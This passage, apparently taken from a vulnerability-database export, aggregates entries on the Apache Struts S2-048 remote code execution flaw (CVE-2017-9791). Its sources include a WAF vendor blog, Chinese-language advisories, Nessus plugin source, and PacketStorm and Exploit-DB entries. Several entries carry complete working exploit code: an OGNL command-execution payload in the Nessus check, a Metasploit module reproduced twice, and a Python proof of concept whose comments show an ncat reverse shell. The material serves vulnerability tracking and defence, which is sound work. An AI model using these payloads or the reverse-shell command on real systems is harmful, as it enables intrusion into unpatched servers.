process.\u201d These kinds of alerts are an early \u201ctell\u201d that something is afoot, and our research team uses them as both an early indicator, as well as to inform our ThreatRadar threat intelligence feeds.\n * If the app is susceptible to the vulnerability, a malicious payload will still not conform to normal application traffic. In the case of CVE-2017-9805, SecureSphere will identify an \u201cunknown parameter\u201d or \u201cparameter type violation.\u201d\n * In most cases, the payload is much larger/longer than a normal request. In these cases, a \u201cparameter length violation\u201d will surface.\n\n## The Role of App Security Domain Expertise\n\nWhat only someone who lives and breathes this stuff on a day-in/day-out basis knows is that any one of these violations by themselves isn\u2019t necessarily an attack. Policies built on evaluating any of this in isolation can result in a high rate of false positives. False positives are the bane of IT security\u2019s existence, _because when looking at a screen full of alerts, you don\u2019t know which ones are false and which aren\u2019t. _The net effect is ignoring them all.\n\nSecureSphere WAF has [patented capabilities](<https://www.imperva.com/Products/AdvancedTechnologies>) that evaluate the relationships between multiple violations. This ability to analyze seemingly independent violations coming from different layers of the app stack (e.g., network protocol, parameter length, IP reputation, etc.) together greatly enhances accuracy. This not only minimizes false positives, but more importantly provides the confidence to actually _block_ requests.\n\n## Manage Business Risk, Protect Against App Exploits\n\nAccording to the [2017 Verizon Data Breach Investigation Report](<http://www.verizonenterprise.com/verizon-insights-lab/dbir/2017/>) more successful breaches resulted from attacks on web apps than any other type of attack. This is telling since web app attacks are only number four in terms of incident frequency.\n\nAttackers realize that web app frameworks like Struts (and all frameworks have security issues) are particularly attractive targets. Since they are used for public facing web apps, they can\u2019t be hidden behind layers of network security. Their role is to accept inputs (web form parameters, API calls, etc.) and then process these inputs, which directly maps to particularly dangerous exploits like SQL injection and RCE. Since frameworks are widely adopted, attackers automate their attacks so they can cost effectively leverage their effort across thousands of websites.\n\nBusiness will roll out more application functionality. The cost savings and revenue generating opportunities from digital transformation pretty much guarantee we\u2019ll have more app surface area next year than this year. Learn more about how to use these capabilities to protect this ever growing surface area with Imperva SecureSphere [Web Application Firewall (WAF)](<https://www.imperva.com/Products/WebApplicationFirewall-WAF>) and [Imperva Incapsula WAF](<https://www.incapsula.com/website-security/web-application-firewall.html>).", "modified": "2017-09-18T20:33:25", "published": "2017-09-18T20:33:25", "href": "https://www.imperva.com/blog/2017/09/apache-struts-rce-and-managing-app-risk/", "id": "IMPERVABLOG:C40BB28F51D206C8BB23721D1ECED353", "title": "Apache Struts, RCE and Managing App Risk", "type": "impervablog", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "myhack58": [{"lastseen": "2017-07-08T08:19:43", "bulletinFamily": "info", "description": "Recently, from the bucket as technology Tophant security researcher icez found Struts2 showcase application in the presence of a remote code execution high-risk vulnerabilities. Struts2 official has confirmed the vulnerability, the vulnerability number S2-048, CVE number: CVE-2017-9791, the vulnerability degree of harm for high-risk(High). \nVulnerability number \nCVE-2017-9791 \nS2-048 \n! [](/Article/UploadPic/2017-7/201778113815603. png? www. myhack58. com) \nVulnerability \nStruts 2.3. x series the Showcase application \nIt is worth mentioning that the showcase refers to an application, usually in the path \\struts-2.3. x\\apps\\struts2-showcase. war exists, if on the server and not installed the application is not subject to the vulnerability. \nVulnerability overview \nApache Struts is a United States Apache\uff08the Apache Software Foundation is responsible for the maintenance of an open source project, is used to create enterprise-class Java Web application open source MVC framework. In Struts 2.3. x series the Showcase application demo Struts2 integration of the Struts 1 Plug-in there is a arbitrary code execution vulnerability. When your app uses Struts2 Struts1 plugin, it may lead to untrusted input passed to the ActionMessage class in the lead to command execution. \nSolutions \nTo ActionMessage passes the original message using the following resource key value, don't directly pass the original value \nmessages. add(\"msg\", new ActionMessage(\"struts1. gangsterAdded\", gform. getName())); \nThe value should not be the case: \nmessages. add(\"msg\", new ActionMessage(\"Gangster\" + gform. getName() + \"was added\")); \n\n", "modified": "2017-07-08T00:00:00", "published": "2017-07-08T00:00:00", "id": "MYHACK58:62201787696", "href": "http://www.myhack58.com/Article/html/3/62/2017/87696.htm", "title": "Vulnerability warning | bucket pixel technology found in high-risk Struts2 showcase remote code execution vulnerability S2-048-the vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-07-08T08:19:36", "bulletinFamily": "info", "description": "Vulnerability ID: CVE-2017-9791 \nVulnerability author: icez ic3z#qq.com \nAffected version: Struts 2.3. x \nVulnerability rating: high risk \nVulnerability Brief Description: When the Struts 2 in Struts 1 Plug-in is enabled, an attacker through the use of malicious field values may cause the RCE. These untrusted input data is brought into the ActionMessage class in the error message. \nTemporary solution: \nDevelopers through the use of resource keys replace the original message is passed directly to the ActionMessage in the way. As shown below \n\nmessages. add(\"msg\", new ActionMessage(\"struts1. gangsterAdded\", gform. getName())); \nMust not be used in the following manner \n\nmessages. add(\"msg\", new ActionMessage(\"Gangster\" + gform. getName() + \"was added\")); \nVerification screenshot \n! [](/Article/UploadPic/2017-7/201778111753855. png? www. myhack58. com) \nReference links \nhttps://cwiki.apache.org/confluence/display/WW/S2-048 \n\n", "modified": "2017-07-08T00:00:00", "published": "2017-07-08T00:00:00", "id": "MYHACK58:62201787686", "href": "http://www.myhack58.com/Article/html/3/62/2017/87686.htm", "title": "struts2 and double \u53d2 \u53d5 a high-risk vulnerability S2-048-the vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 0.0, "vector": "NONE"}}], "nessus": [{"lastseen": "2019-02-21T01:32:42", "bulletinFamily": "scanner", "description": "The Struts 1 plugin in Apache Struts 2.3.x is affected by a remote code execution vulnerability via a malicious field value passed in a raw message to the ActionMessage class.", "modified": "2019-02-07T00:00:00", "id": "STRUTS_2_3_X_RCE.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=102918", "published": "2017-09-01T00:00:00", "title": "Apache Struts 2.3.x Struts 1 plugin RCE (remote)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(102918);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/02/07 12:14:48\");\n\n script_cve_id(\"CVE-2017-9791\");\n script_bugtraq_id(99484);\n\n script_name(english:\"Apache Struts 2.3.x Struts 1 plugin RCE (remote)\");\n script_summary(english:\"Attempts to execute arbitrary commands on the remote web server.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a web application that uses a Java\nframework which is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Struts 1 plugin in Apache Struts 2.3.x is affected by a remote \ncode execution vulnerability via a malicious field value passed in a \nraw message to the ActionMessage class.\"\n);\n script_set_attribute(attribute:\"see_also\", value:\"http://struts.apache.org/docs/s2-048.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-048\");\n script_set_attribute(attribute:\"solution\", value:\n\" Refer to the s2-048 vendor advisory for mitigation options\n\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-9791\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Struts 2 Struts 1 Plugin ActionMessage < 2.3.32 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts 2 Struts 1 Plugin Showcase OGNL Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\", \"webmirror.nasl\");\n script_require_ports(\"Services/www\", 80, 8080);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"http.inc\");\ninclude(\"misc_func.inc\");\n\nport = get_http_port(default:8080);\ncgis = get_kb_list('www/' + port + '/cgi');\n\nvuln = FALSE;\nurls = make_list();\n# To identify actions that we can test the exploit on we will look\n# for files with the .action suffix from the KB.\nif (!isnull(cgis))\n{\n foreach cgi (cgis)\n {\n match = pregmatch(pattern:\"((^.*)(/.+\\.act(ion)?)($|\\?|;))\", string:cgi);\n if (match)\n {\n urls = make_list(urls, match[0]);\n if (!thorough_tests) break;\n }\n if (cgi =~ \"struts2?(-rest)?-showcase\")\n {\n urls = make_list(urls, cgi);\n if (!thorough_tests) break;\n }\n }\n}\nif (thorough_tests)\n{\n cgi2 = get_kb_list('www/' + port + '/content/extensions/act*');\n if (!isnull(cgi2)) urls = make_list(urls, cgi2);\n\n}\n\n# Always check web root\nurls = make_list(urls, \"/\");\n\n# Struts is slow\ntimeout = get_read_timeout() * 2;\nif(timeout < 10)\n timeout = 10;\nhttp_set_read_timeout(timeout);\n\nurls = list_uniq(urls);\n\nunix_cmd = 'id';\nwin_cmd = 'ipconfig%20%2Fall';\ndata = \"age=20&__checkbox_bustedBefore=true&name=%25%7B%28%23_%3D%27multipart%2Fform-data%27%29.%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27%2Fc%27%2C%27\"+win_cmd+\"%27%7D%3A%7B%27%2Fbin%2Fbash%27%2C%27-c%27%2C%27\"+unix_cmd+\"%27%7D%29%29.%28%23p%3Dnew+java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%23ros%3D%28%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getOutputStream%28%29%29%29.%28%40org.apache.commons.io.IOUtils%40copy%28%23process.getInputStream%28%29%2C%23ros%29%29.%28%23ros.flush%28%29%29%7D&description=1\";\n\n\nforeach url (urls)\n{\n res = http_send_recv3(\n method : \"POST\",\n item : url,\n port : port,\n data : data,\n exit_on_fail : TRUE,\n content_type: \"application/x-www-form-urlencoded\"\n );\n\n if (\"Windows IP\" >< res[2] || \"uid\" >< res[2])\n {\n if (res[2] =~ \"uid=[0-9]+.*gid=[0-9]+.*\")\n {\n output = strstr(res[2], \"uid\");\n if (!empty_or_null(output))\n {\n vuln = TRUE;\n vuln_url = build_url(qs:url, port:port);\n break;\n }\n }\n else if (res[2] =~ \"Subnet Mask|Windows IP|IP(v(4|6)?)? Address\")\n {\n output = strstr(res[2], \"Windows IP\");\n if (!empty_or_null(output))\n {\n vuln = TRUE;\n vuln_url = build_url(qs:url, port:port);\n break;\n }\n }\n }\n # Stop after first vulnerable Struts app is found\n if (vuln) break;\n}\n\nif (!vuln) exit(0, 'No vulnerable applications were detected on the web server listening on port '+port+'.');\n\nsecurity_report_v4(\n port : port,\n severity : SECURITY_HOLE,\n generic : TRUE,\n request : make_list(http_last_sent_request()),\n output : chomp(output)\n);\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:31:41", "bulletinFamily": "scanner", "description": "The version of Apache Struts running on the remote Windows host is 2.3.x. It is, therefore, potentially affected by a remote code execution vulnerability in the Struts 1 plugin showcase app in the ActionMessage class due to improper validation of user-supplied input passed via error messages. An unauthenticated, remote attacker can exploit this to execute arbitrary code.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "modified": "2019-02-15T00:00:00", "id": "STRUTS_2_3_X_RCE_WIN_LOCAL.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=101361", "published": "2017-07-11T00:00:00", "title": "Apache Struts 2.3.x Showcase App Struts 1 Plugin ActionMessage Class Error Message Input Handling RCE (S2-048)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(101361);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/02/15 10:32:14\");\n\n script_cve_id(\"CVE-2017-9791\");\n script_bugtraq_id(99484);\n\n script_name(english:\"Apache Struts 2.3.x Showcase App Struts 1 Plugin ActionMessage Class Error Message Input Handling RCE (S2-048)\");\n script_summary(english:\"Checks if Struts 2.3.x version is installed.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host contains a web application that uses a Java\nframework that is affected by a potential remote code execution\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts running on the remote Windows host is\n2.3.x. It is, therefore, potentially affected by a remote code\nexecution vulnerability in the Struts 1 plugin showcase app in the\nActionMessage class due to improper validation of user-supplied input\npassed via error messages. An unauthenticated, remote attacker can\nexploit this to execute arbitrary code.\n\nNote that Nessus has not tested for this issue but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://struts.apache.org/docs/s2-048.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Refer to the vendor advisory for recommendations on passing data\nto the 'ActionMessage' class.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-9791\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Struts 2 Struts 1 Plugin ActionMessage < 2.3.32 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts 2 Struts 1 Plugin Showcase OGNL Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/11\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"struts_detect_win.nbin\", \"struts_detect_nix.nbin\", \"struts_config_browser_detect.nbin\");\n script_require_keys(\"Settings/ParanoidReport\");\n script_require_ports(\"installed_sw/Apache Struts\",\"installed_sw/Struts\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n\napp_info = vcf::combined_get_app_info(app:\"Apache Struts\");\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [\n { \"min_version\" : \"2.3.0\", \"fixed_version\" : \"2.3.33\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "dsquare": [{"lastseen": "2017-11-21T12:11:55", "bulletinFamily": "exploit", "description": "Remote command execution vulnerability in Apache Struts 2 Struts 1 plugin ActionMessage class error message input handling\n\nVulnerability Type: Remote Command Execution", "modified": "2017-10-20T00:00:00", "published": "2017-10-20T00:00:00", "id": "E-601", "href": "", "type": "dsquare", "title": "Apache Struts 2 Struts 1 Plugin ActionMessage < 2.3.32 RCE", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2018-05-17T17:16:35", "bulletinFamily": "exploit", "description": "", "modified": "2018-05-16T00:00:00", "published": "2018-05-16T00:00:00", "id": "PACKETSTORM:147664", "href": "https://packetstormsecurity.com/files/147664/Apache-Struts-2-Struts-1-Plugin-Showcase-OGNL-Code-Execution.html", "title": "Apache Struts 2 Struts 1 Plugin Showcase OGNL Code Execution", "type": "packetstorm", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Apache Struts 2 Struts 1 Plugin Showcase OGNL Code Execution', \n'Description' => %q{ This module exploits a remote code execution vulnerability in the Struts Showcase app in the Struts 1 plugin example in Struts 2.3.x series. Remote Code Execution can be performed via a malicious field value. }, \n'License' => MSF_LICENSE, \n'Author' => [ \n'icez <ic3z at qq dot com>', \n'Nixawk', \n'xfer0' \n], \n'References' => [ \n[ 'CVE', '2017-9791' ], \n[ 'BID', '99484' ], \n[ 'EDB', '42324' ], \n[ 'URL', 'https://cwiki.apache.org/confluence/display/WW/S2-048' ] \n], \n'Privileged' => true, \n'Targets' => [ \n[ \n'Universal', { \n'Platform' => %w{ linux unix win }, \n'Arch' => [ ARCH_CMD ] \n} \n] \n], \n'DisclosureDate' => 'Jul 07 2017', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOpt::RPORT(8080), \nOptString.new('TARGETURI', [ true, 'The path to a struts application action', '/struts2-showcase/integration/saveGangster.action' ]), \nOptString.new('POSTPARAM', [ true, 'The HTTP POST parameter', 'name' ]) \n] \n) \nend \n \ndef send_struts_request(ognl) \nvar_a = rand_text_alpha_lower(4) \nvar_b = rand_text_alpha_lower(4) \nuri = normalize_uri(datastore['TARGETURI']) \n \ndata = { \ndatastore['POSTPARAM'] => ognl, \n'age' => var_a, \n'__checkbox_bustedBefore' => 'true', \n'description' => var_b \n} \n \nresp = send_request_cgi({ \n'uri' => uri, \n'method' => 'POST', \n'vars_post' => data \n}) \n \nif resp && resp.code == 404 \nfail_with(Failure::BadConfig, 'Server returned HTTP 404, please double check TARGETURI') \nend \nresp \nend \n \ndef check \nvar_a = rand_text_alpha_lower(4) \nvar_b = rand_text_alpha_lower(4) \nognl = \"%{'#{var_a}' + '#{var_b}'}\" \n \nbegin \nresp = send_struts_request(ognl) \nrescue Msf::Exploit::Failed \nreturn Exploit::CheckCode::Unknown \nend \n \nif resp && resp.code == 200 && resp.body.include?(\"#{var_a}#{var_b}\") \nExploit::CheckCode::Vulnerable \nelse \nExploit::CheckCode::Safe \nend \nend \n \ndef exploit \nresp = exec_cmd(payload.encoded) \nunless resp and resp.code == 200 \nfail_with(Failure::Unknown, \"Exploit failed.\") \nend \n \nprint_good(\"Command executed\") \nprint_line(resp.body) \nend \n \ndef exec_cmd(cmd) \nognl = \"%{(#_='multipart/form-data').\" \nognl << \"(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).\" \nognl << \"(#_memberAccess?(#_memberAccess=#dm):\" \nognl << \"((#container=#context['com.opensymphony.xwork2.ActionContext.container']).\" \nognl << \"(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).\" \nognl << \"(#ognlUtil.getExcludedPackageNames().clear()).\" \nognl << \"(#ognlUtil.getExcludedClasses().clear()).\" \nognl << \"(#context.setMemberAccess(#dm)))).\" \nognl << \"(#cmd='#{cmd}').\" \nognl << \"(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).\" \nognl << \"(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).\" \nognl << \"(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).\" \nognl << \"(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}\" \n \nsend_struts_request(ognl) \nend \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/147664/struts2_code_exec_showcase.rb.txt"}, {"lastseen": "2017-07-15T22:47:02", "bulletinFamily": "exploit", "description": "", "modified": "2017-07-14T00:00:00", "published": "2017-07-14T00:00:00", "href": "https://packetstormsecurity.com/files/143375/Apache-Struts-2.3.x-Showcase-Remote-Code-Execution.html", "id": "PACKETSTORM:143375", "title": "Apache Struts 2.3.x Showcase Remote Code Execution", "type": "packetstorm", "sourceData": "`#!/usr/bin/python \n# -*- coding: utf-8 -*- \n \n# Just a demo for CVE-2017-9791 \n \n \nimport requests \n \n \ndef exploit(url, cmd): \nprint(\"[+] command: %s\" % cmd) \n \npayload = \"%{\" \npayload += \"(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).\" \npayload += \"(#_memberAccess?(#_memberAccess=#dm):\" \npayload += \"((#container=#context['com.opensymphony.xwork2.ActionContext.container']).\" \npayload += \"(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).\" \npayload += \"(#ognlUtil.getExcludedPackageNames().clear()).\" \npayload += \"(#ognlUtil.getExcludedClasses().clear()).\" \npayload += \"(#context.setMemberAccess(#dm)))).\" \npayload += \"(@java.lang.Runtime@getRuntime().exec('%s'))\" % cmd \npayload += \"}\" \n \ndata = { \n\"name\": payload, \n\"age\": 20, \n\"__checkbox_bustedBefore\": \"true\", \n\"description\": 1 \n} \n \nheaders = { \n'Referer': 'http://127.0.0.1:8080/2.3.15.1-showcase/integration/editGangster' \n} \nrequests.post(url, data=data, headers=headers) \n \n \nif __name__ == '__main__': \nimport sys \n \nif len(sys.argv) != 3: \nprint(\"python %s <url> <cmd>\" % sys.argv[0]) \nsys.exit(0) \n \nprint('[*] exploit Apache Struts2 S2-048') \nurl = sys.argv[1] \ncmd = sys.argv[2] \n \nexploit(url, cmd) \n \n# $ ncat -v -l -p 4444 & \n# $ python exploit_S2-048.py http://127.0.0.1:8080/2.3.15.1-showcase/integration/saveGangster.action \"ncat -e /bin/bash 127.0.0.1 4444\" \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/143375/apachestruts23x-exec.txt"}], "exploitdb": [{"lastseen": "2018-05-24T14:22:17", "bulletinFamily": "exploit", "description": "Apache Struts 2 - Struts 1 Plugin Showcase OGNL Code Execution (Metasploit). CVE-2017-9791. Remote exploit for Multiple platform. Tags: Metasploit Framework ...", "modified": "2018-05-17T00:00:00", "published": "2018-05-17T00:00:00", "id": "EDB-ID:44643", "href": "https://www.exploit-db.com/exploits/44643/", "type": "exploitdb", "title": "Apache Struts 2 - Struts 1 Plugin Showcase OGNL Code Execution (Metasploit)", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Apache Struts 2 Struts 1 Plugin Showcase OGNL Code Execution',\r\n 'Description' => %q{ This module exploits a remote code execution vulnerability in the Struts Showcase app in the Struts 1 plugin example in Struts 2.3.x series. Remote Code Execution can be performed via a malicious field value. },\r\n 'License' => MSF_LICENSE,\r\n 'Author' => [\r\n 'icez <ic3z at qq dot com>',\r\n 'Nixawk',\r\n 'xfer0'\r\n ],\r\n 'References' => [\r\n [ 'CVE', '2017-9791' ],\r\n [ 'BID', '99484' ],\r\n [ 'EDB', '42324' ],\r\n [ 'URL', 'https://cwiki.apache.org/confluence/display/WW/S2-048' ]\r\n ],\r\n 'Privileged' => true,\r\n 'Targets' => [\r\n [\r\n 'Universal', {\r\n 'Platform' => %w{ linux unix win },\r\n 'Arch' => [ ARCH_CMD ]\r\n }\r\n ]\r\n ],\r\n 'DisclosureDate' => 'Jul 07 2017',\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(8080),\r\n OptString.new('TARGETURI', [ true, 'The path to a struts application action', '/struts2-showcase/integration/saveGangster.action' ]),\r\n OptString.new('POSTPARAM', [ true, 'The HTTP POST parameter', 'name' ])\r\n ]\r\n )\r\n end\r\n\r\n def send_struts_request(ognl)\r\n var_a = rand_text_alpha_lower(4)\r\n var_b = rand_text_alpha_lower(4)\r\n uri = normalize_uri(datastore['TARGETURI'])\r\n\r\n data = {\r\n datastore['POSTPARAM'] => ognl,\r\n 'age' => var_a,\r\n '__checkbox_bustedBefore' => 'true',\r\n 'description' => var_b\r\n }\r\n\r\n resp = send_request_cgi({\r\n 'uri' => uri,\r\n 'method' => 'POST',\r\n 'vars_post' => data\r\n })\r\n\r\n if resp && resp.code == 404\r\n fail_with(Failure::BadConfig, 'Server returned HTTP 404, please double check TARGETURI')\r\n end\r\n resp\r\n end\r\n\r\n def check\r\n var_a = rand_text_alpha_lower(4)\r\n var_b = rand_text_alpha_lower(4)\r\n ognl = \"%{'#{var_a}' + '#{var_b}'}\"\r\n\r\n begin\r\n resp = send_struts_request(ognl)\r\n rescue Msf::Exploit::Failed\r\n return Exploit::CheckCode::Unknown\r\n end\r\n\r\n if resp && resp.code == 200 && resp.body.include?(\"#{var_a}#{var_b}\")\r\n Exploit::CheckCode::Vulnerable\r\n else\r\n Exploit::CheckCode::Safe\r\n end\r\n end\r\n\r\n def exploit\r\n resp = exec_cmd(payload.encoded)\r\n unless resp and resp.code == 200\r\n fail_with(Failure::Unknown, \"Exploit failed.\")\r\n end\r\n\r\n print_good(\"Command executed\")\r\n print_line(resp.body)\r\n end\r\n\r\n def exec_cmd(cmd)\r\n ognl = \"%{(#_='multipart/form-data').\"\r\n ognl << \"(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).\"\r\n ognl << \"(#_memberAccess?(#_memberAccess=#dm):\"\r\n ognl << \"((#container=#context['com.opensymphony.xwork2.ActionContext.container']).\"\r\n ognl << \"(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).\"\r\n ognl << \"(#ognlUtil.getExcludedPackageNames().clear()).\"\r\n ognl << \"(#ognlUtil.getExcludedClasses().clear()).\"\r\n ognl << \"(#context.setMemberAccess(#dm)))).\"\r\n ognl << \"(#cmd='#{cmd}').\"\r\n ognl << \"(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).\"\r\n ognl << \"(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).\"\r\n ognl << \"(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).\"\r\n ognl << \"(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}\"\r\n\r\n send_struts_request(ognl)\r\n end\r\nend", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/44643/"}], "saint": [{"lastseen": "2018-06-23T21:18:06", "bulletinFamily": "exploit", "description": "Added: 06/06/2018 \nCVE: [CVE-2017-9791](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9791>) \nBID: [99484](<http://www.securityfocus.com/bid/99484>) \n\n\n### Background\n\nApache Struts is an open-source web application framework for developing Java EE web applications. The Struts 1 plugin allows developers to use Struts 1 Actions and ActionForms in Struts 2 applications. The Showcase application is an example application in the Struts 1 plugin. \n\n### Problem\n\nThe Showcase application in the Struts 1 plugin allows a remote attacker to inject commands within OGNL code, resulting in arbitrary command execution. \n\n### Resolution\n\nRemove the Struts 1 plugin and/or the Showcase example application if it is not needed. \n\nAlways use resource keys instead of passing a 